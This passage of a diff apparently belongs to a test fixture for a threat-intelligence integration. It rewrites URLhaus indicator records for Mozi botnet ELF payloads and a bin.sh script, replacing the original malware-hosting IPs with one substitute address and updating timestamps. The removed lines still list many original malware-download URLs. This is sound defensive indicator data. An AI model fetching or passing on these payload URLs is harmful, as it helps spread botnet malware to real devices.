"type": "indicator", "kind": "enrichment" @@ -17533,18 +17533,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://119.118.75.183:55796/Mozi.m", + "original": "http://89.160.20.156:55796/Mozi.m", "scheme": "http", "port": 55796, - "domain": "119.118.75.183", - "full": "http://119.118.75.183:55796/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55796/Mozi.m" }, - "ip": "119.118.75.183" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693843903Z", - "original": "{\"id\":\"961185\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961185/\",\"url\":\"http://119.118.75.183:55796/Mozi.m\",\"url_status\":\"online\",\"host\":\"119.118.75.183\",\"date_added\":\"2021-01-14 18:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027119500Z", + "original": "{\"id\":\"961185\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961185/\",\"url\":\"http://89.160.20.156:55796/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17582,18 +17582,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://175.206.182.103:52308/Mozi.m", + "original": "http://89.160.20.156:52308/Mozi.m", "scheme": "http", "port": 52308, - "domain": "175.206.182.103", - "full": "http://175.206.182.103:52308/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52308/Mozi.m" }, - "ip": "175.206.182.103" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693846989Z", - "original": "{\"id\":\"961183\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961183/\",\"url\":\"http://175.206.182.103:52308/Mozi.m\",\"url_status\":\"online\",\"host\":\"175.206.182.103\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027126500Z", + "original": "{\"id\":\"961183\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961183/\",\"url\":\"http://89.160.20.156:52308/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17631,18 +17631,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.162.104:59154/Mozi.m", + "original": "http://89.160.20.156:59154/Mozi.m", "scheme": "http", "port": 59154, - "domain": "117.222.162.104", - "full": "http://117.222.162.104:59154/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59154/Mozi.m" }, - "ip": "117.222.162.104" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693850125Z", - "original": "{\"id\":\"961184\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961184/\",\"url\":\"http://117.222.162.104:59154/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.162.104\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027133400Z", + "original": "{\"id\":\"961184\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961184/\",\"url\":\"http://89.160.20.156:59154/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17680,18 +17680,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://122.188.192.87:57950/Mozi.m", + "original": "http://89.160.20.156:57950/Mozi.m", "scheme": "http", "port": 57950, - "domain": "122.188.192.87", - "full": "http://122.188.192.87:57950/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57950/Mozi.m" }, - "ip": "122.188.192.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693853441Z", - "original": "{\"id\":\"961177\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961177/\",\"url\":\"http://122.188.192.87:57950/Mozi.m\",\"url_status\":\"online\",\"host\":\"122.188.192.87\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027140400Z", + "original": "{\"id\":\"961177\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961177/\",\"url\":\"http://89.160.20.156:57950/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17729,18 +17729,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.141.8.40:33520/Mozi.m", + "original": "http://89.160.20.156:33520/Mozi.m", "scheme": "http", "port": 33520, - "domain": "222.141.8.40", - "full": "http://222.141.8.40:33520/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33520/Mozi.m" }, - "ip": "222.141.8.40" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693857308Z", - "original": "{\"id\":\"961178\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961178/\",\"url\":\"http://222.141.8.40:33520/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.141.8.40\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027147900Z", + "original": "{\"id\":\"961178\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961178/\",\"url\":\"http://89.160.20.156:33520/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17778,18 +17778,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.202.127:45525/Mozi.m", + "original": "http://89.160.20.156:45525/Mozi.m", "scheme": "http", "port": 45525, - "domain": "123.14.202.127", - "full": "http://123.14.202.127:45525/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45525/Mozi.m" }, - "ip": "123.14.202.127" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693860795Z", - "original": "{\"id\":\"961179\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961179/\",\"url\":\"http://123.14.202.127:45525/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.202.127\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027155100Z", + "original": "{\"id\":\"961179\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961179/\",\"url\":\"http://89.160.20.156:45525/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17827,18 +17827,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://41.86.21.38:38430/Mozi.m", + "original": "http://89.160.20.156:38430/Mozi.m", "scheme": "http", "port": 38430, - "domain": "41.86.21.38", - "full": "http://41.86.21.38:38430/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38430/Mozi.m" }, - "ip": "41.86.21.38" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693863941Z", - "original": "{\"id\":\"961180\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961180/\",\"url\":\"http://41.86.21.38:38430/Mozi.m\",\"url_status\":\"online\",\"host\":\"41.86.21.38\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027162Z", + "original": "{\"id\":\"961180\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961180/\",\"url\":\"http://89.160.20.156:38430/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17876,18 +17876,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://220.125.119.207:4096/Mozi.m", + "original": "http://89.160.20.156:4096/Mozi.m", "scheme": "http", "port": 4096, - "domain": "220.125.119.207", - "full": "http://220.125.119.207:4096/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:4096/Mozi.m" }, - "ip": "220.125.119.207" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693867097Z", - "original": "{\"id\":\"961181\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961181/\",\"url\":\"http://220.125.119.207:4096/Mozi.m\",\"url_status\":\"online\",\"host\":\"220.125.119.207\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027168900Z", + "original": "{\"id\":\"961181\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961181/\",\"url\":\"http://89.160.20.156:4096/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17925,18 +17925,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://121.150.209.136:50631/Mozi.a", + "original": "http://89.160.20.156:50631/Mozi.a", "scheme": "http", "port": 50631, - "domain": "121.150.209.136", - "full": "http://121.150.209.136:50631/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50631/Mozi.a" }, - "ip": "121.150.209.136" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693870583Z", - "original": "{\"id\":\"961182\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961182/\",\"url\":\"http://121.150.209.136:50631/Mozi.a\",\"url_status\":\"online\",\"host\":\"121.150.209.136\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027175900Z", + "original": "{\"id\":\"961182\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961182/\",\"url\":\"http://89.160.20.156:50631/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17974,18 +17974,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.122.85:37989/Mozi.m", + "original": "http://89.160.20.156:37989/Mozi.m", "scheme": "http", "port": 37989, - "domain": "186.33.122.85", - "full": "http://186.33.122.85:37989/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37989/Mozi.m" }, - "ip": "186.33.122.85" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693873879Z", - "original": "{\"id\":\"961176\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961176/\",\"url\":\"http://186.33.122.85:37989/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.122.85\",\"date_added\":\"2021-01-14 18:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027182900Z", + "original": "{\"id\":\"961176\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961176/\",\"url\":\"http://89.160.20.156:37989/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18023,18 +18023,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.157.253.54:54078/Mozi.m", + "original": "http://89.160.20.156:54078/Mozi.m", "scheme": "http", "port": 54078, - "domain": "219.157.253.54", - "full": "http://219.157.253.54:54078/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54078/Mozi.m" }, - "ip": "219.157.253.54" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693877236Z", - "original": "{\"id\":\"961175\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961175/\",\"url\":\"http://219.157.253.54:54078/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.157.253.54\",\"date_added\":\"2021-01-14 18:20:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027189900Z", + "original": "{\"id\":\"961175\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961175/\",\"url\":\"http://89.160.20.156:54078/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18072,18 +18072,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://219.154.108.170:34201/i", + "original": "http://89.160.20.156:34201/i", "scheme": "http", "port": 34201, - "domain": "219.154.108.170", - "full": "http://219.154.108.170:34201/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34201/i" }, - "ip": "219.154.108.170" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693880502Z", - "original": "{\"id\":\"961173\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961173/\",\"url\":\"http://219.154.108.170:34201/i\",\"url_status\":\"online\",\"host\":\"219.154.108.170\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.027196800Z", + "original": "{\"id\":\"961173\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961173/\",\"url\":\"http://89.160.20.156:34201/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18121,18 +18121,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.59.119.91:56573/Mozi.m", + "original": "http://89.160.20.156:56573/Mozi.m", "scheme": "http", "port": 56573, - "domain": "115.59.119.91", - "full": "http://115.59.119.91:56573/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56573/Mozi.m" }, - "ip": "115.59.119.91" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693883748Z", - "original": "{\"id\":\"961174\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961174/\",\"url\":\"http://115.59.119.91:56573/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.59.119.91\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027203700Z", + "original": "{\"id\":\"961174\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961174/\",\"url\":\"http://89.160.20.156:56573/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18171,18 +18171,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://125.44.61.35:48291/bin.sh", + "original": "http://89.160.20.156:48291/bin.sh", "scheme": "http", "port": 48291, - "domain": "125.44.61.35", - "full": "http://125.44.61.35:48291/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48291/bin.sh" }, - "ip": "125.44.61.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693886994Z", - "original": "{\"id\":\"961172\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961172/\",\"url\":\"http://125.44.61.35:48291/bin.sh\",\"url_status\":\"online\",\"host\":\"125.44.61.35\",\"date_added\":\"2021-01-14 18:08:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.027210800Z", + "original": "{\"id\":\"961172\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961172/\",\"url\":\"http://89.160.20.156:48291/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:08:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18220,18 +18220,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.92.217.195:60102/Mozi.m", + "original": "http://89.160.20.156:60102/Mozi.m", "scheme": "http", "port": 60102, - "domain": "59.92.217.195", - "full": "http://59.92.217.195:60102/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60102/Mozi.m" }, - "ip": "59.92.217.195" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693890500Z", - "original": "{\"id\":\"961170\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961170/\",\"url\":\"http://59.92.217.195:60102/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.92.217.195\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027217800Z", + "original": "{\"id\":\"961170\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961170/\",\"url\":\"http://89.160.20.156:60102/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18269,18 +18269,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.92.183.181:52225/Mozi.m", + "original": "http://89.160.20.156:52225/Mozi.m", "scheme": "http", "port": 52225, - "domain": "59.92.183.181", - "full": "http://59.92.183.181:52225/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52225/Mozi.m" }, - "ip": "59.92.183.181" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693893716Z", - "original": "{\"id\":\"961171\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961171/\",\"url\":\"http://59.92.183.181:52225/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.92.183.181\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027224800Z", + "original": "{\"id\":\"961171\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961171/\",\"url\":\"http://89.160.20.156:52225/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18318,18 +18318,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.95.7:56733/Mozi.m", + "original": "http://89.160.20.156:56733/Mozi.m", "scheme": "http", "port": 56733, - "domain": "59.99.95.7", - "full": "http://59.99.95.7:56733/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56733/Mozi.m" }, - "ip": "59.99.95.7" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693896943Z", - "original": "{\"id\":\"961167\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961167/\",\"url\":\"http://59.99.95.7:56733/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.95.7\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027231700Z", + "original": "{\"id\":\"961167\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961167/\",\"url\":\"http://89.160.20.156:56733/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18367,18 +18367,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.82.105:57042/Mozi.m", + "original": "http://89.160.20.156:57042/Mozi.m", "scheme": "http", "port": 57042, - "domain": "58.249.82.105", - "full": "http://58.249.82.105:57042/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57042/Mozi.m" }, - "ip": "58.249.82.105" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693900159Z", - "original": "{\"id\":\"961168\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961168/\",\"url\":\"http://58.249.82.105:57042/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.82.105\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027238600Z", + "original": "{\"id\":\"961168\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961168/\",\"url\":\"http://89.160.20.156:57042/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18416,18 +18416,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.188.73:38035/Mozi.m", + "original": "http://89.160.20.156:38035/Mozi.m", "scheme": "http", "port": 38035, - "domain": "59.99.188.73", - "full": "http://59.99.188.73:38035/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38035/Mozi.m" }, - "ip": "59.99.188.73" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693903415Z", - "original": "{\"id\":\"961169\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961169/\",\"url\":\"http://59.99.188.73:38035/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.188.73\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027245500Z", + "original": "{\"id\":\"961169\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961169/\",\"url\":\"http://89.160.20.156:38035/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 